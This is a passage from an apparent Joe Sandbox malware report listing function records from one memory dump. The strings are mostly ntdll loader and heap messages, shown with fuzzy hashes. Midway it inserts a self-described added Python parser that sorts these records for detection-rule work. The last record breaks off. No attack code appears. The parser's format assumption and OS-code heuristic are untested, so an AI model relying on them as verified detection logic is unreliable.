• Instruction ID: 7f7cf886162b45346146ba9f20a373ac3a609408b03743ce84df317d80f38e2a
• Opcode Fuzzy Hash: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
• Instruction Fuzzy Hash: 6151D3715083919BC335EF198C44BABBBE8BF843A0F24491EF85D83181EB70D945E7A2
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
• Opcode ID: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
• Instruction ID: b64594d385b9418dd989b77106dca68b901e607b2a8ba884e346e2e4c9fe69d0
• Opcode Fuzzy Hash: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
• Instruction Fuzzy Hash: C9D1D031900689DFCB22DF68C851ABDBBF1FF49720F088059E6459B263CB39D981EB10
Strings
• VerifierFlags, xrefs: 00FC8C50
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC8A67
• HandleTraces, xrefs: 00FC8C8F
• VerifierDlls, xrefs: 00FC8CBD
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC8A3D
• VerifierDebug, xrefs: 00FC8CA5
• AVRF: -*- final list of providers -*- , xrefs: 00FC8B8F
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
• Opcode ID: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
• Instruction ID: b0819d7eb16ddcc8b186dc7825fd56457ae4d641d360b4515567760ae7b13356
• Opcode Fuzzy Hash: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
• Instruction Fuzzy Hash: E0914872A05712AFC321DF68DE83F5A77A8BB84760F05441DF9816B291CB78EC06E791
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
• Opcode ID: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
• Instruction ID: 08bbd55141d56afe252836feb142cdeec6a5cf7233e2122ede9be5b3e7216a10
• Opcode Fuzzy Hash: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
• Instruction Fuzzy Hash: 1CA24C75E056298FDB64CF18CC887A9BBB5BF85314F2442E9D80DA7250DB74AE85EF00
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
• Opcode ID: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
• Instruction ID: a87aa24b23a5bac97cb0f7008ea3d9d155c891565faaf7878bf1ecc214073adc
• Opcode Fuzzy Hash: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
• Instruction Fuzzy Hash: 7D916931E00710ABDB35EF15ED45BEA37A4BF41B24F14412AF944AB2C2D779A841FB92
Strings
• apphelp.dll, xrefs: 00F36496
• Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 00F999ED
• minkernel\ntdll\ldrinit.c, xrefs: 00F99A11, 00F99A3A
• Getting the shim user exports failed with status 0x%08lx, xrefs: 00F99A01
• LdrpInitShimEngine, xrefs: 00F999F4, 00F99A07, 00F99A30
• Loading the shim user DLL failed with status 0x%08lx, xrefs: 00F99A2A
Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-204845295
                                                                                                                                                                                                                      • Opcode ID: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                                                                                                                                                      • Instruction ID: a1c26a7fdf087e4b6e52d2b0d6ca198cdc2fd9a53050fcbab1561c32b519c5c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351D171608300ABE720DF24DC82BAB77E8FB84754F00491DF5859B1A1D778E904EB92
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB81E5
                                                                                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 00FB8170
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00F7C6C3
                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 00FB8181, 00FB81F5
                                                                                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 00FB8177, 00FB81EB
                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 00F7C6C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                                                                                      • Opcode ID: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                                                                                                                                                      • Instruction ID: fe06095576291c647f9192054226eacc5d406c6bbd1c7a90b2a5b61877e71f76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A310B716443159FC220EF68DD87E5A7798FFC5B10F04452CF8889B291DA28DD05EBA3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB219F
                                                                                                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 00FB2160, 00FB219A, 00FB21BA
                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB2178
                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB2180
                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB21BF
                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 00FB2165
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                                                                                                      • Opcode ID: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                                                                                                                                                      • Instruction ID: 87fa217a3a256f02c76dee81986bf3ef1dd9201d0e48017de2e7286123808e43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF315C36F0032177E7219A598C86FDFB778DB54B50F15405ABA0877241D270DE01FBA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00F82DF0: LdrInitializeThunk.NTDLL ref: 00F82DFA
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BA3
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BB6
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D60
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D74
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1404860816-0
                                                                                                                                                                                                                      • Opcode ID: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                                                                                                                                                      • Instruction ID: a6000922a38e5ec15ba7a29d783e079ebd3cb490cb49413de746b191b76c10e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C426B72900715DFDB60DF64C881BEAB7F4BF04310F1485A9E999EB241EB74AA84DF60
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                                                                                                      • Opcode ID: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                                                                                                                                                      • Instruction ID: 5c4cdf5ddfef660705167e3d1c4d62905b61aa86798af2dbe0e160808eb7c9cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6C19BB56483828FD711CF18C540B6ABBE4FF85714F04486AFC958B261E778CA49EB53
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00F78421
                                                                                                                                                                                                                      • @, xrefs: 00F78591
                                                                                                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7855E
                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 00F78422
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                                                                                                      • Opcode ID: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                                                                                                                                                      • Instruction ID: e162fc613903edb2f025227b4825d6658bdb6a7596497005389b2b654d1b66e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB91BD71548340AFD721EE21CC45FABBBECBF84794F44492EFA8892041E738D945AB63
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • .Local, xrefs: 00F728D8
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB21D9, 00FB22B1
• SXS: %s() passed the empty activation context, xrefs: 00FB21DE
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB22B6
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
• Opcode ID: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
• Instruction ID: eed8a7fd440a778388e68070f0b134abdca37a1af9f89ffa9298c99ab1e922d9
• Opcode Fuzzy Hash: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
• Instruction Fuzzy Hash: E1A1B232D00229DBDB64CF55DC84BE9B3B5BF58324F2441EAD908A7251D7309E81EF92
Strings
• RtlDeactivateActivationContext, xrefs: 00FB3425, 00FB3432, 00FB3451
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3456
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3437
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB342A
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
• Opcode ID: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
• Instruction ID: 253f6b8e65fcedda8825eaf6a59f2ccc8b36339b547835f74980c05cd69ad848
• Opcode Fuzzy Hash: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
• Instruction Fuzzy Hash: F1612A32A44B11DFC722CF19C842B66B7E5EF80B60F15852AF8599B281D734FD01EB92
Strings
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0FE5
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA10AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA106B
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA1028
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
• Instruction ID: 3157dcaa84d1958e8d0417b1ddf4363efb8072917cc06c6c46ad6d9420f1029e
• Opcode Fuzzy Hash: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
• Instruction Fuzzy Hash: BF71BEB19043049FCB20EF14C885B9B7FA8AF96764F140468FD498B286D739D589EBD2
Strings
• apphelp.dll, xrefs: 00F62462
• minkernel\ntdll\ldrinit.c, xrefs: 00FAA9A2
• LdrpDynamicShimModule, xrefs: 00FAA998
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA992
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction ID: 6ebdbf637fc366511db8274f41abff015b28ca286e3bcec09f889f0e736c38d8
• Opcode Fuzzy Hash: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction Fuzzy Hash: 71315BB2A00201EBDB30DF59DC85A6A77B8FB89724F154019F8416F245C77D9D45E741
Strings
• HEAP[%wZ]: , xrefs: 00F53255
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F5327D
• HEAP: , xrefs: 00F53264
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
• Instruction ID: 4455e36199ce4a1247b6a34a6780cc835a12e6d2bd3ccab0c9dedf420879ef35
• Opcode Fuzzy Hash: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
• Instruction Fuzzy Hash: B592EE71E042489FDB25CF68C440BADBBF1FF49311F188159E949AB392D738AA49EF50
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
• Instruction ID: 800173e3050fc6e25cb7b58a0575150f2016bc747bfc322dfac3f5fe61f7cc95
• Opcode Fuzzy Hash: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
• Instruction Fuzzy Hash: 47F1BB71A00A05DFDB25CF68C880B6AB7F5FF45711F248168E9069B382DB34ED85EB90
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
• Opcode ID: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction ID: 38d2cfdc7d3ba0c7368d4822b724bc33b3f46a9171943a24cd14cea335d54336
• Opcode Fuzzy Hash: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction Fuzzy Hash: 40C28072A0C3419FDB25CF24C881BABBBE5AF89754F14892DF989C7241D734D805EB92
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
• Instruction ID: 7f1c415a28137af3d927f80f4803e2c29cbd0e4f77f09b3f33aa18da686b1ad3
• Opcode Fuzzy Hash: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
• Instruction Fuzzy Hash: F6A15A71D016299BDF21DB64CC89BEAB7B8EF48710F1041E9E908A7250D7359E84DF90
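The records above all share one memory dump source (base 0x00F10000) and are split into a string list with cross-reference addresses, the dump source, and the similarity identifiers (API ID, String ID, opcode and instruction fuzzy hashes). The following parser is an added example for this page, not code from the Joe Sandbox report or the Joe Sandbox IDA plugin: it turns records in exactly this layout into structured data and runs two triage checks over them. The rule in classify() (strings naming an ntdll source file or an Rtl*/Ldrp* routine mark the function as OS library code rather than malware-authored code) and the assumption in string_id_consistent() (String ID is the record's strings sorted by code point and joined with "$", which holds for every record with strings in this listing) are this example's own, not documented plugin behaviour. The sample input is two records copied from the listing.

```python
"""Parser and triage checks for Joe Sandbox IDA-plugin function records.
Added example for this page: not code from the Joe Sandbox report or the
Joe Sandbox IDA plugin; classify() and string_id_consistent() encode this
example's own heuristic and format assumption."""
import re

# Constructed sample: two records copied from the listing above (dump source
# 00000005.00000002.2213742805 at base 0x00F10000), indentation dropped.
SAMPLE = r"""Strings
• apphelp.dll, xrefs: 00F62462
• minkernel\ntdll\ldrinit.c, xrefs: 00FAA9A2
• LdrpDynamicShimModule, xrefs: 00FAA998
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA992
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction ID: 6ebdbf637fc366511db8274f41abff015b28ca286e3bcec09f889f0e736c38d8
• Opcode Fuzzy Hash: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
• Instruction Fuzzy Hash: 71315BB2A00201EBDB30DF59DC85A6A77B8FB89724F154019F8416F245C77D9D45E741
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
• Opcode ID: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction ID: 38d2cfdc7d3ba0c7368d4822b724bc33b3f46a9171943a24cd14cea335d54336
• Opcode Fuzzy Hash: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
• Instruction Fuzzy Hash: 40C28072A0C3419FDB25CF24C881BABBBE5AF89754F14892DF989C7241D734D805EB92
"""

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
OS_SYMBOL_RE = re.compile(r"^(Rtl|Ldrp)[A-Za-z0-9]+$")   # heuristic, see classify()


def parse_records(text):
    """One dict per function: {'strings': [(text, [xref addrs])], 'fields': {name: value}}."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()                      # the report indents every line; drop it
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "Strings":            # every record opens with 'Strings'
                records.append({"strings": [], "fields": {}})
            continue
        if not line.startswith("• ") or not records:
            continue
        body = line[2:]
        if section == "Strings":                # '<string>, xrefs: A, B, C'
            text_part, sep, xref_part = body.rpartition(", xrefs: ")
            if not sep:                         # string listed without xrefs
                text_part, xref_part = body, ""
            xrefs = [int(a, 16) for a in xref_part.split(", ") if a]
            records[-1]["strings"].append((text_part, xrefs))
        else:                                   # 'Name: value' (value may be empty)
            key, _, value = body.partition(":")
            records[-1]["fields"][key.strip()] = value.strip()
    return records


def dump_base(rec):
    m = OFFSET_RE.search(rec["fields"].get("Source File", ""))
    return int(m.group(1), 16) if m else None


def xrefs_below_dump_base(rec):
    """Xref addresses below the dump base cannot lie inside the dumped region; flag them."""
    base = dump_base(rec)
    return [a for _, xs in rec["strings"] for a in xs if base is None or a < base]


def string_id_consistent(rec):
    """Assumption: String ID == strings sorted by code point, joined with '$'.
    Records with no listed strings cannot be rebuilt and report False."""
    strings = [s for s, _ in rec["strings"]]
    return bool(strings) and "$".join(sorted(strings)) == rec["fields"].get("String ID")


def classify(rec):
    """Heuristic (this example's own): an ntdll source path or an Rtl*/Ldrp* routine
    name means OS library code that sits in the dump, not malware-authored code."""
    for s, _ in rec["strings"]:
        if s.startswith("minkernel\\ntdll\\") or OS_SYMBOL_RE.match(s):
            return "os-library"
    return "unknown"


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(hex(dump_base(r)), classify(r), string_id_consistent(r),
              r["fields"]["API ID"] or "-", r["fields"]["Instruction Fuzzy Hash"][:16])
```

Because every line is stripped before matching, parse_records() accepts the indented listing as exported from the report without any preprocessing; feed it the whole "Strings ... Instruction Fuzzy Hash" run and it yields one record per function. Functions classified "os-library" are the ones to set aside when picking instruction fuzzy hashes for a detection rule, since hashes of ntdll-derived code would also match every clean process that maps the same library code.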
Strings
• LdrpCheckModule, xrefs: 00FAA117
• minkernel\ntdll\ldrinit.c, xrefs: 00FAA121
• Failed to allocated memory for shimmed module list, xrefs: 00FAA10F
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
                                                                                                                                                                                                                      • Opcode ID: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                                                                                                                                                      • Instruction ID: 5c075d946e21bb912a752eecae1f1048f026cc6799d8b9568bef6cde6e8e1d5f
